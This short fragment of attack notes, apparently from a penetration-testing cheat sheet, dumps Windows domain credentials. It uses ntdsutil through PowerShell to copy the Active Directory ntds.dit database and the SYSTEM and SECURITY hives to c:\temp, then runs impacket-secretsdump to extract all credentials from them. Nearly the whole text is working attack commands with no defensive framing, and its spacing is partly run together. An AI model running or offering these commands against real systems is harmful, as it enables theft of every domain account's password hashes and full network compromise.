CMD> powershell"ntdsutil.exe 'ac i ntds' 'ifm' 'create full c:\temp' q q"# We can see that the ntds.dit and SYSTEM as well as SECURITY registry hives are being dumped to c:\temp:# Dump all credentials Kali> impacket-secretsdump-systemSYSTEM-securitySECURITY-ntdsntds.ditlocal